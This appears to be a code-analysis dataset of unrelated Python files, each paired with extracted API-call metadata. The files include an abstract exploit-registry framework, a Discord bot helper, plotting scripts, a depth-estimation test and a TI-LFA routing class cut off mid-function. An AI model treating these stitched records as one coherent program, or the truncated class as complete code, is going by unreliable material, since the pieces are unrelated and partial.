[((130, 153), 'django.contrib.admin.register', 'admin.register', (['Company'], {}), '(Company)\n', (144, 153), False, 'from django.contrib import admin\n'), ((233, 259), 'django.contrib.admin.register', 'admin.register', (['Contractor'], {}), '(Contractor)\n', (247, 259), False, 'from django.contrib import admin\n')]
|
import asyncio
import inspect
import logging
from abc import ABC, abstractclassmethod
from collections import defaultdict
from typing import Callable, Set, Type, Dict, List, Union
from json import JSONEncoder
class Exploit(ABC):
@abstractclassmethod
def generate_payload(command: str) -> Union[str, List[str]]:
pass
@abstractclassmethod
def run_payload(payload: str) -> None:
pass
vulnerable_function: Union[Callable, str] = None
source: str = ""
category_name: str = ""
notes: str = ""
@classmethod
def get_vulnerable_function_fqn(cls):
return (
cls.vulnerable_function
if isinstance(cls.vulnerable_function, str)
else (
cls.vulnerable_function.__module__
+ "."
+ cls.vulnerable_function.__qualname__
)
)
class AsyncEventLoop:
def __enter__(self):
self.loop = asyncio.new_event_loop()
asyncio.set_event_loop(self.loop)
return self.loop
def __exit__(self, *args):
self.loop.close()
class ExploitEncoder(JSONEncoder):
def default(self, exploit: Exploit):
if not issubclass(exploit, Exploit):
super().default(exploit)
return {
"vulnerable_function": exploit.get_vulnerable_function_fqn(),
"source": exploit.source,
"category_name": exploit.category_name,
"notes": exploit.notes,
}
def get_exploits_by_category() -> Dict[str, Type[Exploit]]:
exploits_by_category = defaultdict(list)
for exploit in get_exploits():
exploits_by_category[exploit.category_name].append(exploit)
return exploits_by_category
def get_exploit(class_name: str) -> Type[Exploit]:
return next(exploit for exploit in get_exploits() if exploit.__name__ == class_name)
def get_exploits(starting_class: Type[Exploit] = Exploit, exclude_abstract=True) -> Set[Type[Exploit]]:
subclasses = set()
parents_to_process = [starting_class]
while parents_to_process:
parent = parents_to_process.pop()
for child in parent.__subclasses__():
if child not in subclasses:
subclasses.add(child)
parents_to_process.append(child)
if exclude_abstract:
subclasses = set(filter(lambda cls: not inspect.isabstract(cls), subclasses))
return subclasses
|
[
"collections.defaultdict",
"asyncio.set_event_loop",
"inspect.isabstract",
"asyncio.new_event_loop"
] |
[((1573, 1590), 'collections.defaultdict', 'defaultdict', (['list'], {}), '(list)\n', (1584, 1590), False, 'from collections import defaultdict\n'), ((948, 972), 'asyncio.new_event_loop', 'asyncio.new_event_loop', ([], {}), '()\n', (970, 972), False, 'import asyncio\n'), ((981, 1014), 'asyncio.set_event_loop', 'asyncio.set_event_loop', (['self.loop'], {}), '(self.loop)\n', (1003, 1014), False, 'import asyncio\n'), ((2359, 2382), 'inspect.isabstract', 'inspect.isabstract', (['cls'], {}), '(cls)\n', (2377, 2382), False, 'import inspect\n')]
|
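A rough usage sketch for the exploit registry in the row above. The module's real file name isn't shown, so the import from exploits.py and the EvalExploit subclass are illustrative assumptions only:

import json
from exploits import Exploit, ExploitEncoder, get_exploits  # hypothetical module name

class EvalExploit(Exploit):
    # Concrete subclass: overriding both abstract methods makes it non-abstract,
    # so get_exploits() (which skips abstract classes) will discover it.
    vulnerable_function = "builtins.eval"
    source = "example"
    category_name = "code execution"

    @classmethod
    def generate_payload(cls, command: str) -> str:
        return f"print({command!r})"

    @classmethod
    def run_payload(cls, payload: str) -> None:
        eval(payload)  # deliberately harmless stand-in for a real payload

# Classes are serialised via ExploitEncoder.default(), which emits the
# vulnerable function FQN, source, category and notes for each subclass.
print(json.dumps(sorted(get_exploits(), key=lambda c: c.__name__),
                 cls=ExploitEncoder, indent=2))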
import os
from google_search import GoogleCustomSearch
#set variables
os.environ["SEARCH_ENGINE_ID"] = "000839040200690289140:u2lurwk5tko"
os.environ["GOOGLE_CLOUD_API_KEY"] = "<KEY>"
SEARCH_ENGINE_ID = os.environ['SEARCH_ENGINE_ID']
API_KEY = os.environ['GOOGLE_CLOUD_API_KEY']
api = GoogleCustomSearch(SEARCH_ENGINE_ID, API_KEY)
print("we got here\n")
#for result in api.search('prayer', 'https://cse.google.com/cse/publicurl?cx=000839040200690289140:u2lurwk5tko'):
for result in api.search('pdf', 'http://scraperwiki.com'):
print(result['title'])
print(result['link'])
print(result['snippet'])
|
[
"google_search.GoogleCustomSearch"
] |
[((315, 360), 'google_search.GoogleCustomSearch', 'GoogleCustomSearch', (['SEARCH_ENGINE_ID', 'API_KEY'], {}), '(SEARCH_ENGINE_ID, API_KEY)\n', (333, 360), False, 'from google_search import GoogleCustomSearch\n')]
|
# Import needed libraries
import discord
import os
import pymongo
import pendulum
import requests
import re
if os.path.exists("env.py"):
import env
# Define Environment Variables
MONGO_DBNAME = os.environ.get("MONGO_DBNAME")
MONGO_URI = os.environ.get("MONGO_URI")
MONGO_CONN = pymongo.MongoClient(MONGO_URI)
MONGO = pymongo.MongoClient(MONGO_URI)[MONGO_DBNAME]
# Get Existing Server League Object from Mongo
def get_existing_league(message):
existing_league = MONGO.servers.find_one(
{"server": str(message.guild.id)})
MONGO_CONN.close()
return existing_league
# Get Existing Player Object from Mongo
def get_existing_player(first_name, last_name, team_abbreviation):
existing_player = MONGO.players.find_one(
{"name": re.compile(f'{first_name} {last_name}', re.IGNORECASE), "team": re.compile(team_abbreviation, re.IGNORECASE)})
MONGO_CONN.close()
return existing_player
# Get All Server Objects from Mongo
def get_all_servers():
servers = MONGO.servers.find(
{})
MONGO_CONN.close()
return servers
# Set Embed for Discord Bot Responses
def my_embed(title, description, color, name, value, inline, bot):
embed = discord.Embed(title=title, description=description, color=color)
embed.add_field(name=name, value=value, inline=inline)
embed.set_author(name='Sleeper-FFL', icon_url=bot.user.display_avatar)
return embed
# Get Current Week
def get_current_week():
today = pendulum.today(tz='America/New_York')
nfl_state = requests.get(
'https://api.sleeper.app/v1/state/nfl'
)
nfl_date_list = nfl_state.json()["season_start_date"].split("-")
starting_week = pendulum.datetime(int(nfl_date_list[0]), int(nfl_date_list[1]), int(nfl_date_list[2]), tz='America/New_York')
if starting_week.is_future():
future = True
week = 1
else:
future = False
week = today.diff(starting_week).in_weeks() + 1
return week, future
# Check if a Server Has Patron Status
def is_patron(existing_league):
if "patron" in existing_league:
if existing_league["patron"] == "1":
return True
else:
return False
else:
return False
|
[
"pymongo.MongoClient",
"discord.Embed",
"os.path.exists",
"os.environ.get",
"pendulum.today",
"requests.get",
"re.compile"
] |
[((112, 136), 'os.path.exists', 'os.path.exists', (['"""env.py"""'], {}), "('env.py')\n", (126, 136), False, 'import os\n'), ((202, 232), 'os.environ.get', 'os.environ.get', (['"""MONGO_DBNAME"""'], {}), "('MONGO_DBNAME')\n", (216, 232), False, 'import os\n'), ((245, 272), 'os.environ.get', 'os.environ.get', (['"""MONGO_URI"""'], {}), "('MONGO_URI')\n", (259, 272), False, 'import os\n'), ((286, 316), 'pymongo.MongoClient', 'pymongo.MongoClient', (['MONGO_URI'], {}), '(MONGO_URI)\n', (305, 316), False, 'import pymongo\n'), ((325, 355), 'pymongo.MongoClient', 'pymongo.MongoClient', (['MONGO_URI'], {}), '(MONGO_URI)\n', (344, 355), False, 'import pymongo\n'), ((1229, 1293), 'discord.Embed', 'discord.Embed', ([], {'title': 'title', 'description': 'description', 'color': 'color'}), '(title=title, description=description, color=color)\n', (1242, 1293), False, 'import discord\n'), ((1503, 1540), 'pendulum.today', 'pendulum.today', ([], {'tz': '"""America/New_York"""'}), "(tz='America/New_York')\n", (1517, 1540), False, 'import pendulum\n'), ((1557, 1609), 'requests.get', 'requests.get', (['"""https://api.sleeper.app/v1/state/nfl"""'], {}), "('https://api.sleeper.app/v1/state/nfl')\n", (1569, 1609), False, 'import requests\n'), ((782, 836), 're.compile', 're.compile', (['f"""{first_name} {last_name}"""', 're.IGNORECASE'], {}), "(f'{first_name} {last_name}', re.IGNORECASE)\n", (792, 836), False, 'import re\n'), ((846, 890), 're.compile', 're.compile', (['team_abbreviation', 're.IGNORECASE'], {}), '(team_abbreviation, re.IGNORECASE)\n', (856, 890), False, 'import re\n')]
|
import os, shutil
from setuptools import setup, find_packages
#
CUR_PATH = os.path.dirname(os.path.abspath(__file__))
path = os.path.join(CUR_PATH, 'build')
if os.path.isdir(path):
print('INFO del dir ', path)
shutil.rmtree(path)
setup(
name = 'pipeline',
# Author details
author='JiejunHuo',
author_email='<EMAIL>',
version = '0.1',
description='Creating MODIS and 2B-CLDCLASS-lidar co-located files (following the earlier work by Zantedeschi et al. (2019))',
packages = find_packages('src','netcdf'),
package_data = {
# include the *.nc in the netcdf folder
'netcdf': ['*.nc'],
},
include_package_data = True,
#exclude_package_data = {'docs':['1.txt']},
license='MIT',
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Topic :: System :: Logging',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
],
py_modules=["pipeline"],
install_requires = [
'netCDF4==1.5.1.2',
'scikit-learn==0.20.0',
'scipy==1.1.0',
],
)
|
[
"os.path.abspath",
"os.path.isdir",
"shutil.rmtree",
"os.path.join",
"setuptools.find_packages"
] |
[((126, 157), 'os.path.join', 'os.path.join', (['CUR_PATH', '"""build"""'], {}), "(CUR_PATH, 'build')\n", (138, 157), False, 'import os, shutil\n'), ((161, 180), 'os.path.isdir', 'os.path.isdir', (['path'], {}), '(path)\n', (174, 180), False, 'import os, shutil\n'), ((92, 117), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (107, 117), False, 'import os, shutil\n'), ((220, 239), 'shutil.rmtree', 'shutil.rmtree', (['path'], {}), '(path)\n', (233, 239), False, 'import os, shutil\n'), ((513, 543), 'setuptools.find_packages', 'find_packages', (['"""src"""', '"""netcdf"""'], {}), "('src', 'netcdf')\n", (526, 543), False, 'from setuptools import setup, find_packages\n')]
|
import matplotlib.pyplot as plt
import pandas as pd
from scipy.interpolate import make_interp_spline, BSpline
import numpy as np
def plot_results(title, csv_name):
df = pd.read_csv('../' + csv_name + '.csv')
ax = plt.gca()
df.columns = ['V', 'E', 'Time']
df = df[['V', 'Time']]
df = pd.DataFrame(df.groupby('V').mean()).reset_index()
print(df.head(5))
df.plot(kind='line',x='V',y='Time', color='blue', ax=ax)
ax.set_xlabel("No. of Transactions")
ax.set_ylabel("Time (ms)")
# ax.set_title("IRI Testing Results")
ax.set_title(title + " implementation Test Results")
df = df.sort_values(by=['V'])
tNew = np.linspace(df['V'].min(), df['V'].max(), 7)
spl = make_interp_spline(df['V'].to_numpy(), df['Time'].to_numpy(), k=3) # type: BSpline
edgesSmooth = spl(tNew)
plt.plot(tNew, edgesSmooth, "r-")
plt.savefig(csv_name + '.jpg', dpi=150, bbox_inches='tight')
# plt.show()
if __name__ == "__main__":
# plot_results('IRI', 'benchmarks.real.iri')
plot_results('Proposed', 'benchmarks.real.ours')
|
[
"pandas.read_csv",
"matplotlib.pyplot.savefig",
"matplotlib.pyplot.plot",
"matplotlib.pyplot.gca"
] |
[((171, 209), 'pandas.read_csv', 'pd.read_csv', (["('../' + csv_name + '.csv')"], {}), "('../' + csv_name + '.csv')\n", (182, 209), True, 'import pandas as pd\n'), ((216, 225), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (223, 225), True, 'import matplotlib.pyplot as plt\n'), ((782, 815), 'matplotlib.pyplot.plot', 'plt.plot', (['tNew', 'edgesSmooth', '"""r-"""'], {}), "(tNew, edgesSmooth, 'r-')\n", (790, 815), True, 'import matplotlib.pyplot as plt\n'), ((817, 877), 'matplotlib.pyplot.savefig', 'plt.savefig', (["(csv_name + '.jpg')"], {'dpi': '(150)', 'bbox_inches': '"""tight"""'}), "(csv_name + '.jpg', dpi=150, bbox_inches='tight')\n", (828, 877), True, 'import matplotlib.pyplot as plt\n')]
|
import argparse
import os
import shutil
import json
import numpy as np
import torch
import torch.nn as nn
import matplotlib.pyplot as plt
from dense_estimation.resnet import resnet50
from dense_estimation.output import GaussianScaleMixtureOutput, PowerExponentialOutput
from dense_estimation.losses import (BerHuLoss, RMSLoss, RelLoss, TestingLosses, HuberLoss,
Log10Loss, DistributionLogLoss)
#from dense_estimation.distributions import GaussianScaleMixture, PowerExponential
from dense_estimation.datasets.nyu_depth_v2 import NYU_Depth_V2
from dense_estimation.data import get_testing_loader
from dense_estimation.app.experiment import get_experiment
from dense_estimation.app.gui import display
from dense_estimation.logger import DistributionVisualizer, BasicVisualizer, visuals_to_numpy
parser = argparse.ArgumentParser(description='testing script')
parser.add_argument('--no_cuda', action='store_true', help='use cpu')
parser.add_argument('--threads', type=int, default=16, help='number of threads for data loader')
parser.add_argument('--seed', type=int, default=123, help='random seed to use')
parser.add_argument('--ex', type=str, default='default',
help='comma separated names of experiments to compare; use name:epoch to specify epoch to load')
parser.add_argument('--gpu', type=str, default='0', help='cuda device to use if using --cuda')
parser.add_argument('--max', type=int, default=20, help='max number of examples to visualize')
parser.add_argument('--samples', type=int, default=1, help='number of monte carlo dropout samples (sampling enabled if > 1)')
opt = parser.parse_args()
cuda = not opt.no_cuda
if cuda:
os.environ['CUDA_VISIBLE_DEVICES'] = opt.gpu
if not torch.cuda.is_available():
raise Exception("No GPU found, please run without --cuda")
out_size = (208, 256)
transf_size = (out_size[1], out_size[0])
raw_root = '/home/smeister/datasets'
testing_loader = get_testing_loader(NYU_Depth_V2, raw_root, 1, transf_size,
opt.threads, debug=False)
class BasicDist():
def __init__(self, mean, var):
self.mean = mean
self.variance = var
def _test(ex, epoch):
results = []
with open('./log/{}/opts.txt'.format(ex), 'r') as f:
ex_opt = json.load(f)
if ex_opt['dist'] != '':
dist_map = {
'gsm': (GaussianScaleMixture, lambda: GaussianScaleMixtureOutput(ex_opt['num_gaussians'])),
'exp': (PowerExponential, lambda: PowerExponentialOutput()),
}
distribution, output_unit = dist_map[ex_opt['dist'] ]
model = resnet50(output=output_unit(), fpn=ex_opt['fpn'], dropout_active=False)
visualizer = DistributionVisualizer(distribution)
dropout_active = False
else:
output_unit = None
dropout_active = opt.samples > 1
model = resnet50(fpn=ex_opt['fpn'], dropout_active=dropout_active)
if dropout_active:
distribution = BasicDist
visualizer = DistributionVisualizer(BasicDist)
else:
distribution = None
visualizer = BasicVisualizer()
losses_clses = [RMSLoss(), RelLoss(), Log10Loss()]
#if distribution is not None:
# losses_clses += [DistributionLogLoss(distribution)]
testing_multi_criterion = TestingLosses(losses_clses)
if cuda:
model = model.cuda()
testing_multi_criterion = testing_multi_criterion.cuda()
_, _, restore_path, _ = get_experiment(ex, False, epoch=epoch)
state_dict = torch.load(restore_path)
model.load_state_dict(state_dict)
loss_names = [m.__class__.__name__
for m in testing_multi_criterion.scalar_losses]
losses = np.zeros(len(loss_names))
model.eval()
prob = 0
num = opt.max if opt.max != -1 else len(testing_loader)
averages = []
for i, batch in enumerate(testing_loader):
print(i)
if i > num: break
input = torch.autograd.Variable(batch[0], volatile=True)
target = torch.autograd.Variable(batch[1], volatile=True)
if cuda:
input = input.cuda()
target = target.cuda()
# Predictions are computed at half resolution
upsample = nn.UpsamplingBilinear2d(size=target.size()[2:])
samples = []
if dropout_active:
for _ in range(opt.samples):
sample = model(input)
samples.append(sample)
stacked = torch.cat(samples, dim=1)
mean = torch.mean(stacked, dim=1)
var = torch.var(stacked, dim=1)
output = [mean, var]
else:
output = model(input)
if isinstance(output, list):
output = [upsample(x) for x in output]
cpu_outputs = [x.cpu().data for x in output]
d = distribution(*output)
output = d.mean
if output_unit:
prob += torch.mean(d.prob(target[:, 0:1, :, :])).cpu().data[0]
averages.append(d.averages)
else:
output = upsample(output)
cpu_outputs = [output.cpu().data]
losses += testing_multi_criterion(output, target).cpu().data.numpy()
viz_pt = visualizer(input.cpu().data, cpu_outputs, target.cpu().data)
images = visuals_to_numpy(viz_pt)
results.append(images)
losses /= len(testing_loader)
loss_strings = ["{}: {:.4f}".format(n, l)
for n, l in zip(loss_names, losses)]
print("===> [{}] Testing {}"
.format(ex, ', '.join(loss_strings)))
if output_unit:
averages = torch.squeeze(torch.mean(torch.stack(averages, dim=1), dim=1))
prob /= len(testing_loader)
print("===> [{}] Avg. Likelihood {}".format(ex, prob))
print("===> [{}] Dist. Averages {}"
.format(ex, averages.cpu().data.numpy()))
distribution.plot(averages, label=ex)
return results, visualizer.names
if __name__ == '__main__':
results = []
plt.figure()
for spec in opt.ex.split(','):
splits = spec.split(':')
ex = splits[0]
epoch = int(splits[1]) if len(splits) == 2 else None
result, image_names = _test(ex, epoch)
results.append(result)
plt.legend()
plt.show()
display(results, image_names)
|
[
"argparse.ArgumentParser",
"torch.var",
"torch.cat",
"matplotlib.pyplot.figure",
"dense_estimation.losses.Log10Loss",
"dense_estimation.output.PowerExponentialOutput",
"torch.load",
"dense_estimation.output.GaussianScaleMixtureOutput",
"dense_estimation.data.get_testing_loader",
"dense_estimation.app.experiment.get_experiment",
"dense_estimation.resnet.resnet50",
"dense_estimation.logger.visuals_to_numpy",
"torch.mean",
"dense_estimation.losses.RelLoss",
"matplotlib.pyplot.show",
"dense_estimation.losses.TestingLosses",
"torch.autograd.Variable",
"matplotlib.pyplot.legend",
"torch.cuda.is_available",
"dense_estimation.logger.BasicVisualizer",
"dense_estimation.app.gui.display",
"json.load",
"torch.stack",
"dense_estimation.losses.RMSLoss",
"dense_estimation.logger.DistributionVisualizer"
] |
[((841, 894), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""testing script"""'}), "(description='testing script')\n", (864, 894), False, 'import argparse\n'), ((1965, 2053), 'dense_estimation.data.get_testing_loader', 'get_testing_loader', (['NYU_Depth_V2', 'raw_root', '(1)', 'transf_size', 'opt.threads'], {'debug': '(False)'}), '(NYU_Depth_V2, raw_root, 1, transf_size, opt.threads,\n debug=False)\n', (1983, 2053), False, 'from dense_estimation.data import get_testing_loader\n'), ((3346, 3373), 'dense_estimation.losses.TestingLosses', 'TestingLosses', (['losses_clses'], {}), '(losses_clses)\n', (3359, 3373), False, 'from dense_estimation.losses import BerHuLoss, RMSLoss, RelLoss, TestingLosses, HuberLoss, Log10Loss, DistributionLogLoss\n'), ((3511, 3549), 'dense_estimation.app.experiment.get_experiment', 'get_experiment', (['ex', '(False)'], {'epoch': 'epoch'}), '(ex, False, epoch=epoch)\n', (3525, 3549), False, 'from dense_estimation.app.experiment import get_experiment\n'), ((3567, 3591), 'torch.load', 'torch.load', (['restore_path'], {}), '(restore_path)\n', (3577, 3591), False, 'import torch\n'), ((6048, 6060), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (6058, 6060), True, 'import matplotlib.pyplot as plt\n'), ((6296, 6308), 'matplotlib.pyplot.legend', 'plt.legend', ([], {}), '()\n', (6306, 6308), True, 'import matplotlib.pyplot as plt\n'), ((6313, 6323), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (6321, 6323), True, 'import matplotlib.pyplot as plt\n'), ((6328, 6357), 'dense_estimation.app.gui.display', 'display', (['results', 'image_names'], {}), '(results, image_names)\n', (6335, 6357), False, 'from dense_estimation.app.gui import display\n'), ((1752, 1777), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (1775, 1777), False, 'import torch\n'), ((2309, 2321), 'json.load', 'json.load', (['f'], {}), '(f)\n', (2318, 2321), False, 'import json\n'), ((2731, 2767), 'dense_estimation.logger.DistributionVisualizer', 'DistributionVisualizer', (['distribution'], {}), '(distribution)\n', (2753, 2767), False, 'from dense_estimation.logger import DistributionVisualizer, BasicVisualizer, visuals_to_numpy\n'), ((2893, 2951), 'dense_estimation.resnet.resnet50', 'resnet50', ([], {'fpn': "ex_opt['fpn']", 'dropout_active': 'dropout_active'}), "(fpn=ex_opt['fpn'], dropout_active=dropout_active)\n", (2901, 2951), False, 'from dense_estimation.resnet import resnet50\n'), ((3185, 3194), 'dense_estimation.losses.RMSLoss', 'RMSLoss', ([], {}), '()\n', (3192, 3194), False, 'from dense_estimation.losses import BerHuLoss, RMSLoss, RelLoss, TestingLosses, HuberLoss, Log10Loss, DistributionLogLoss\n'), ((3196, 3205), 'dense_estimation.losses.RelLoss', 'RelLoss', ([], {}), '()\n', (3203, 3205), False, 'from dense_estimation.losses import BerHuLoss, RMSLoss, RelLoss, TestingLosses, HuberLoss, Log10Loss, DistributionLogLoss\n'), ((3207, 3218), 'dense_estimation.losses.Log10Loss', 'Log10Loss', ([], {}), '()\n', (3216, 3218), False, 'from dense_estimation.losses import BerHuLoss, RMSLoss, RelLoss, TestingLosses, HuberLoss, Log10Loss, DistributionLogLoss\n'), ((3993, 4041), 'torch.autograd.Variable', 'torch.autograd.Variable', (['batch[0]'], {'volatile': '(True)'}), '(batch[0], volatile=True)\n', (4016, 4041), False, 'import torch\n'), ((4059, 4107), 'torch.autograd.Variable', 'torch.autograd.Variable', (['batch[1]'], {'volatile': '(True)'}), '(batch[1], volatile=True)\n', (4082, 4107), False, 'import torch\n'), ((5336, 5360), 
'dense_estimation.logger.visuals_to_numpy', 'visuals_to_numpy', (['viz_pt'], {}), '(viz_pt)\n', (5352, 5360), False, 'from dense_estimation.logger import DistributionVisualizer, BasicVisualizer, visuals_to_numpy\n'), ((3041, 3074), 'dense_estimation.logger.DistributionVisualizer', 'DistributionVisualizer', (['BasicDist'], {}), '(BasicDist)\n', (3063, 3074), False, 'from dense_estimation.logger import DistributionVisualizer, BasicVisualizer, visuals_to_numpy\n'), ((3146, 3163), 'dense_estimation.logger.BasicVisualizer', 'BasicVisualizer', ([], {}), '()\n', (3161, 3163), False, 'from dense_estimation.logger import DistributionVisualizer, BasicVisualizer, visuals_to_numpy\n'), ((4504, 4529), 'torch.cat', 'torch.cat', (['samples'], {'dim': '(1)'}), '(samples, dim=1)\n', (4513, 4529), False, 'import torch\n'), ((4549, 4575), 'torch.mean', 'torch.mean', (['stacked'], {'dim': '(1)'}), '(stacked, dim=1)\n', (4559, 4575), False, 'import torch\n'), ((4594, 4619), 'torch.var', 'torch.var', (['stacked'], {'dim': '(1)'}), '(stacked, dim=1)\n', (4603, 4619), False, 'import torch\n'), ((5677, 5705), 'torch.stack', 'torch.stack', (['averages'], {'dim': '(1)'}), '(averages, dim=1)\n', (5688, 5705), False, 'import torch\n'), ((2423, 2474), 'dense_estimation.output.GaussianScaleMixtureOutput', 'GaussianScaleMixtureOutput', (["ex_opt['num_gaussians']"], {}), "(ex_opt['num_gaussians'])\n", (2449, 2474), False, 'from dense_estimation.output import GaussianScaleMixtureOutput, PowerExponentialOutput\n'), ((2523, 2547), 'dense_estimation.output.PowerExponentialOutput', 'PowerExponentialOutput', ([], {}), '()\n', (2545, 2547), False, 'from dense_estimation.output import GaussianScaleMixtureOutput, PowerExponentialOutput\n')]
|
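The dense_estimation test script in the row above approximates predictive uncertainty with Monte Carlo dropout: it runs several stochastic forward passes, stacks them, and takes their mean and variance. A minimal self-contained sketch of that aggregation step (toy model, not the script's resnet50) might look like this:

import torch
import torch.nn as nn

# Toy regressor; train() keeps dropout active at inference time, which is
# what the script achieves by building resnet50 with dropout_active enabled.
model = nn.Sequential(nn.Linear(8, 32), nn.ReLU(), nn.Dropout(p=0.5), nn.Linear(32, 1))
model.train()

x = torch.randn(4, 8)            # dummy batch
n_samples = 10                   # number of stochastic forward passes

with torch.no_grad():
    samples = [model(x) for _ in range(n_samples)]

stacked = torch.stack(samples, dim=0)   # (n_samples, batch, 1)
mean = stacked.mean(dim=0)             # predictive mean
var = stacked.var(dim=0)               # predictive variance (uncertainty proxy)
print(mean.shape, var.shape)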
import sys, os
sys.path.append("..")
import helper as h
from constants import SINC
import numpy as np
import matplotlib.pyplot as plt
eigengrid = h.r_window_to_matrix_eig(SINC) # h.window_pad_to_box_rfft(SINC,pad_factor=10.0)
eigengrid_hann = h.r_window_to_matrix_eig(SINC * np.hanning(len(SINC)))
eigengrid_hamm = h.r_window_to_matrix_eig(SINC * np.hamming(len(SINC)))
plt.imshow(abs(eigengrid),aspect="auto")
plt.show(block=True)
plt.subplots(figsize=(10,5))
plt.subplot(121)
plt.semilogy(np.mean(1/abs(eigengrid**2),axis=1),".",label="SINC")
plt.semilogy(np.mean(1/abs(eigengrid_hann**2),axis=1),".",alpha=0.4,label="sinc hanning")
plt.semilogy(np.mean(1/abs(eigengrid_hamm**2),axis=1),".",alpha=0.4,label="sinc hamming")
plt.title("All terms Log Scale")
plt.ylabel("Log R[n]")
plt.xlabel("n")
plt.grid(which="both")
plt.legend()
plt.subplot(122)
plt.plot(np.mean(1/abs(eigengrid[:1000]**2),axis=1),".",label="sinc")
plt.plot(np.mean(1/abs(eigengrid_hann[:1000]**2),axis=1),".",alpha=0.4,label="sinc hanning")
plt.plot(np.mean(1/abs(eigengrid_hamm[:1000]**2),axis=1),".",alpha=0.4,label="sinc hamming")
plt.title("First few terms")
plt.ylabel("R[n]")
plt.xlabel("n")
plt.legend()
plt.suptitle("Quantization Error Increase from Inverse PFB",fontsize=18)
plt.tight_layout()
plt.show(block=True)
|
[
"sys.path.append",
"matplotlib.pyplot.subplot",
"matplotlib.pyplot.title",
"matplotlib.pyplot.tight_layout",
"matplotlib.pyplot.show",
"matplotlib.pyplot.suptitle",
"matplotlib.pyplot.legend",
"helper.r_window_to_matrix_eig",
"matplotlib.pyplot.ylabel",
"matplotlib.pyplot.xlabel",
"matplotlib.pyplot.subplots",
"matplotlib.pyplot.grid"
] |
[((15, 36), 'sys.path.append', 'sys.path.append', (['""".."""'], {}), "('..')\n", (30, 36), False, 'import sys, os\n'), ((147, 177), 'helper.r_window_to_matrix_eig', 'h.r_window_to_matrix_eig', (['SINC'], {}), '(SINC)\n', (171, 177), True, 'import helper as h\n'), ((413, 433), 'matplotlib.pyplot.show', 'plt.show', ([], {'block': '(True)'}), '(block=True)\n', (421, 433), True, 'import matplotlib.pyplot as plt\n'), ((435, 464), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'figsize': '(10, 5)'}), '(figsize=(10, 5))\n', (447, 464), True, 'import matplotlib.pyplot as plt\n'), ((464, 480), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(121)'], {}), '(121)\n', (475, 480), True, 'import matplotlib.pyplot as plt\n'), ((728, 760), 'matplotlib.pyplot.title', 'plt.title', (['"""All terms Log Scale"""'], {}), "('All terms Log Scale')\n", (737, 760), True, 'import matplotlib.pyplot as plt\n'), ((761, 783), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Log R[n]"""'], {}), "('Log R[n]')\n", (771, 783), True, 'import matplotlib.pyplot as plt\n'), ((784, 799), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""n"""'], {}), "('n')\n", (794, 799), True, 'import matplotlib.pyplot as plt\n'), ((800, 822), 'matplotlib.pyplot.grid', 'plt.grid', ([], {'which': '"""both"""'}), "(which='both')\n", (808, 822), True, 'import matplotlib.pyplot as plt\n'), ((823, 835), 'matplotlib.pyplot.legend', 'plt.legend', ([], {}), '()\n', (833, 835), True, 'import matplotlib.pyplot as plt\n'), ((837, 853), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(122)'], {}), '(122)\n', (848, 853), True, 'import matplotlib.pyplot as plt\n'), ((1110, 1138), 'matplotlib.pyplot.title', 'plt.title', (['"""First few terms"""'], {}), "('First few terms')\n", (1119, 1138), True, 'import matplotlib.pyplot as plt\n'), ((1139, 1157), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""R[n]"""'], {}), "('R[n]')\n", (1149, 1157), True, 'import matplotlib.pyplot as plt\n'), ((1158, 1173), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""n"""'], {}), "('n')\n", (1168, 1173), True, 'import matplotlib.pyplot as plt\n'), ((1174, 1186), 'matplotlib.pyplot.legend', 'plt.legend', ([], {}), '()\n', (1184, 1186), True, 'import matplotlib.pyplot as plt\n'), ((1187, 1260), 'matplotlib.pyplot.suptitle', 'plt.suptitle', (['"""Quantization Error Increase from Inverse PFB"""'], {'fontsize': '(18)'}), "('Quantization Error Increase from Inverse PFB', fontsize=18)\n", (1199, 1260), True, 'import matplotlib.pyplot as plt\n'), ((1260, 1278), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (1276, 1278), True, 'import matplotlib.pyplot as plt\n'), ((1279, 1299), 'matplotlib.pyplot.show', 'plt.show', ([], {'block': '(True)'}), '(block=True)\n', (1287, 1299), True, 'import matplotlib.pyplot as plt\n')]
|
import networkx as nx
import os
from diagram import Diagram
from spf import spf
class tilfa:
"""This class provides draft-ietf-rtgwg-segment-routing-ti-lfa TI-LFA calculations"""
def __init__(self, debug=0, ep_space=True, trombone=False):
"""
Init the TI-LFA class.
:param int debug: debug level, 0 is disabled.
:param bool ep_space: Consider nodes in EP space not just P-space
####:param bool trombone: Allow pq_node>dst path to trombone through p_node
:return None: __init__ shouldn't return anything
:rtype: None
"""
        self.debug = debug
self.diagram = Diagram(debug=2)
self.ep_space = ep_space
self.path_types = ["tilfas_link", "tilfas_node"]
self.spf = spf(debug=self.debug)
###self.trombone = trombone
def check_sids(self, graph):
"""
Check that each node has a node SID and that each adjacency has an
        adjacency SID, and that they are valid and unique.
:param networkx.Graph graph: NetworkX graph object
:return bool True: True if all SIDs are present and unique, else false
:rtype: bool
"""
node_sids = []
for node in graph.nodes():
if "node_sid" not in graph.nodes[node]:
raise Exception(
f"Node {node} is missing a node SID, can't run TI-LFA"
)
if type(graph.nodes[node]["node_sid"]) != int:
raise Exception(
f"Node {node} node SID is not an int, can't run TI-LFA"
)
node_sids.append(graph.nodes[node]["node_sid"])
if len(set(node_sids)) < len(node_sids):
raise Exception(
"Nodes found with non-unique node SIDs: "
f"{[sid for sid in node_sids if node_sids.count(sid) > 1]}"
)
adj_sids = []
for edge in graph.edges():
if "adj_sid" not in graph.edges[edge]:
raise Exception(
f"Link {edge} is missing an adjacency SID, can't run TI-LFA"
)
if type(graph.edges[edge]["adj_sid"]) != int:
